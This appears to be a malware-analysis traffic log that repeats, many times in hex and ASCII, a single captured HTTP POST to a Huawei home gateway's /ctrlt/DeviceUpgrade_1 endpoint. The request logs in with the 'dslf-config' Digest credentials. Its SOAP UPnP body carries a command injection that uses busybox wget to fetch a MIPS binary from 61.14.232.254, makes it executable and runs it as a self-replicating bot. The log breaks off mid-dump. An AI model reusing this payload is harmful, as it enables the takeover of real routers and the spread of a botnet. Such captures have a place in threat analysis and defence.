3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 